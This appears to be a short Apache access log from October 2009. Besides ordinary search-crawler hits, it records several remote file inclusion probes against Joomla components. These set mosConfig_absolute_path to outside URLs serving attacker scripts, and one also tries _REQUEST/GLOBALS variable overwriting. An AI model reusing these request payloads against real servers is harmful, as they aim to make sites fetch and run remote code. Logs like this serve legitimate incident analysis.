122.37.68.61 - - [18/Oct/2009:02:21:27 -0400] "GET /logs/access_log.Q109061000%20%20///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:02:22:21 -0400] "GET /logs/error_log.Q109101500 HTTP/1.1" 200 3785191 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.181.7.68 - - [18/Oct/2009:02:23:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
174.143.3.188 - - [18/Oct/2009:02:25:42 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Avant Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [18/Oct/2009:02:25:42 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [18/Oct/2009:02:25:42 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
